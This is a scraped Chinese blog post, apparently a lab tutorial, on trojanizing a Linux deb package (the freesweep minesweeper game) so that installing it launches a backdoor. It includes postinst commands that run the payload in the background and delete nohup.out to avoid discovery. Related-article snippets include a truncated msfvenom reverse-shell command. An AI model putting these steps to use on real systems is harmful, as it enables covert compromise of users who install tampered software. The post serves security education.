制作恶意deb软件包触发后门

最新推荐文章于 2024-07-11 08:57:39 发布
最新推荐文章于 2024-07-11 08:57:39 发布
阅读量229 收藏 4
点赞数 9
文章标签: 网络 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65764670/article/details/136862847
版权

一、实验环境

攻击机:kali IP:192.168.100.127

靶机:Ubuntu IP:192.168.100.135

环境:一个Linux版的扫雷小游戏

目的:将恶意程序和小游戏进行捆绑,发送到靶机并触发后门

二、环境准备

查看小程序包含内容,其中,postinst表示安装完要执行的,postrm安装完要删除处理的

将小程序解压到free文件夹中

三、生成恶意程序

四、创建软件包信息

创建一个叫DEBIAN的软件包信息文件夹(必须是大写这个是固定的)

创建软件包的信息文件(释放处文件格式)

五、安装完成后自动调用执行

​sudo chmod +x /usr/games/freesweep_sources​​:安装完成后会给程序加上执行权限

sudo nohup /usr/games/freesweep_sources &​​:系统后台不挂断,防止注销或退出shell时命令终止

​sudo rm -rf /nohup.out​​:因为执行了上一条命令会生成nohup.out文件,防止被发现得删除

添加执行权限

六、传输软件包

重新构建软件包

将软件包传给目标机(这里因为是做实验,因此直接进行了上传)

七、开启监听

八、建立连接

关闭终端后连接依然继续

佟以冬
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
RPM和DEB软件包打包教程.doc
11-07
Linux系统中,RPM(Red Hat Package Manager)和DEBDebian Package)是两种主要的软件包管理工具,分别用于RHEL(Red Hat Enterprise Linux)、Fedora、CentOS等基于RPM的系统和Debian、Ubuntu等基于DEB的系统。...
postgres_exporter-deb:适用于Ubuntu的带有postgres_exporter的Deb软件包(16.04-18.04)
04-08
用于Ubuntu的带有Deb软件包(xenial,bionic,focus) 安装 apt-get update apt-get install gnupg2 apt-transport-https ca-certificates -y apt-key adv --keyserver hkp://keyserver.ubuntu....
MSF实战制作deb软件包后门
永远是少年
06-13 435
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战制作deb软件包后门。 一、deb恶意软件制作 二、效果检验
制作恶意deb软件包触发后门
2301_76737000的博客
03-13 670
攻击机:Kali靶机:Ubuntu。
2022-渗透测试-制作恶意deb软件包触发后门
保持微笑的博客
01-19 2169
目录 1.下载软件包 2.解压软件包 小知识1:kali更新或安装包的目录 小知识2:kali解压或安装操作 3.生成恶意代码到软件包源文件中 4.创建软件包信息目录 5.重新生成一个软件包 6 将deb提供下载 7 启动msfconsole 8.配置监听 10 目标机下载并安装带木马的deb软件 11.目标机安装软件 12 监控端获取到session 1.下载软件包 kali安装软件包 apt install 软件名称 kali下载软件包 apt --down..
使用MSF-msfvenom制作恶意 deb 软件包触发后门
枫梓林のBlog
04-21 544
使用MSF-msfvenom制作恶意 deb 软件包触发后门 文章目录使用MSF-msfvenom制作恶意 deb 软件包触发后门 实验环境 Kali Linux 2019.1a Kali Linux 2020.4 1.制作恶意软件制作恶意软件包使用 --download-only 方式下载软件包不进行安装 注:freeweep root@fengzilin53:~# apt --download-only install -y freesweep root@fengzilin53:~# m
制作恶意deb软件包linux系统触发后门
xiao_he0123的博客
02-27 2153
文章目录前言一、kali二、操作步骤1.下载一个正常的软件包2.将软件包转移到root目录下3.将安装包解压到root目录中解压为free(文件名)4.制作后门放入free文件中三.总结 前言 通过kali系统中的msf在软件包中植入后门制作deb恶意软件包对linux系统进行shell获取 提示:以下是本篇文章正文内容,下面案例可供参考 一、kali 示例:Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.用户
msf制作恶意deb软件包触发后门
Deeeelete的博客
02-25 990
攻击机:192.168.132.144(kali1) 手害机:192.168.132.133(kali2) 本该是由攻击机生成恶意deb包,然后把包发给受害机让它访问然后监听的,但因为中间有一个包传递的过程,我就直接省略这一步直接在受害机里生成了,但监听地址是填写的攻击机。 1.第一步我们先下载所需的freesweep软件包(这里使用的是kali2) apt --download-only in...
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透2 —制作恶意 deb 软件包触发后门
天下著书立传者,皆为我师
06-20 905
通过msfvenonom生成含病毒和木马到软件包,目标机下载含木马的deb软件,完成与msf相应的通信
Msfvenom制作deb软件包生成后门
Dreamsi_zhang的博客
08-13 644
一、下载正常软件包 apt --download-only install freesweep //下载但不安装软件包freesweep 二、复制到root用户加目录下 为了便于后续操作,复制该软件包到root用户加目录下 默认apt下载后软件包位置路径为:/var/cache/apt/archives/ 四、解压软件包deb包解压 五、生成恶意代码到软件源文件中 msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tc
Ubuntu下的deb制作详解
08-03
Linux 系统中,deb 包是最常用的软件包格式之一,ubuntu 作为 Linux 发行版之一,deb 包的制作和使用是非常重要的。本文将详细介绍如何使用 QT 程序制作 deb 包,并安装到应用程序菜单中。 deb 包的制作主要可以...
debins:一个简单的一键式.Deb软件包安装程序
02-05
"debins" 是一个专为简化.Deb软件包安装过程而设计的工具,它使得在Linux系统中,尤其是Debian及其衍生发行版(如Ubuntu、Linux Mint等)上安装.Deb文件变得更为便捷。"一键式"意味着用户只需要执行一个命令或者点击...
QPM-linux-deb软件包+依赖库
07-23
【QPM-linux-deb软件包+依赖库】是专为Linux环境设计的,特别是针对Qualcomm平台的Hexagon架构进行优化的软件包管理工具。这个软件包包含了Qualcomm Package Manager (QPM) 的版本2.0.21.1,它是Qualcomm公司提供的...
YOLOv10改进 | 特殊场景检测篇 | 轻量级的低照度图像增强网络IAT改进YOLOv10暗光检测(全网独家首发)
热门推荐
Snu77的博客
07-11 1万+
本文给大家带来的改进机制是轻量级的变换器模型:Illumination Adaptive Transformer (IAT),用于图像增强和曝光校正。其基本原理是通过分解图像信号处理器(ISP)管道到局部和全局图像组件,从而恢复在低光或过/欠曝光条件下的正常光照sRGB图像。具体来说,IAT使用注意力查询来表示和调整ISP相关参数,例如颜色校正、伽马校正。模型具有约90k参数和约0.004s的处理速度,能够在低光增强和曝光校正的基准数据集上持续实现优于最新技术(State-of-The-Art, SOTA)
从零开始做题:logtime
weixin_44626085的博客
07-10 244
给出1个pcapng文件。
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
2401_82916694的博客
07-10 649
选择Shared模式,你的Mac会当作虚拟机的路由器。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。
【观成科技】Websocket协议代理隧道加密流量分析与检测
GCKJ_0824的博客
07-10 956
Websocket中的掩码加密使用异或(xor)做简单的加密,当MASK字段对应位被设置为 1 时表示加密,那么后续会设置4字节的Masking-key,Mask位设置为 0 时表示不加密,则不会携带Masking-key。观成科技的安全团队通过研究Websocket协议本身结构特点,并与对应的工具流量相结合,从而提出行之有效的检测方法应用于产品当中,能在Websocket流量中准确发现异常,找出相关隧道的搭建和使用痕迹,保障客户网络的安全。Websocket协议代理工具加密流量检测。
访问控制的定义与原理
最新发布
SafePloy_SH的博客
07-11 313
访问控制(Access Control)是一种重要的安全机制,用于限制对程序中的数据、函数、类以及计算机系统中资源(如文件、数据库、网络设备等)的访问权限。其主要目的是保护系统中的敏感信息和资源,防止未经授权的访问和操作,确保系统的安全性、完整性和可靠性。综上所述,访问控制是保障系统安全的重要手段之一,它通过限制用户对资源的访问权限来防止未经授权的访问和操作。允许用户对自身所创建的访问对象(如文件、数据表等)进行访问,并可将对这些对象的访问权授予其他用户或收回其访问权限。
iperf deb软件包
09-18
要安装iperf deb软件包,您可以按照以下步骤进行操作: 1. 首先,您需要确保已安装dpkg-dev软件包。您可以使用以下命令安装它: ``` apt-get install dpkg-dev ``` 2. 然后,将iperf deb软件包拷贝到/debs目录下。您可以使用以下命令: ``` cp -raf /var/cache/apt/archives/iperf.deb /debs/ ``` 3. 接下来,您需要生成debs目录下的Packages.gz文件,以便apt-get命令能够识别deb软件包。可以使用以下命令生成: ``` dpkg-scanpackages /debs/ /dev/null | gzip >/debs/Packages.gz ``` 4. 最后,修改/debs/Packages.gz文件的权限,使其可读、可写和可执行。可以使用以下命令修改权限: ``` chmod 777 /debs/Packages.gz ``` 完成上述步骤后,您就可以使用apt-get命令安装iperf deb软件包了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值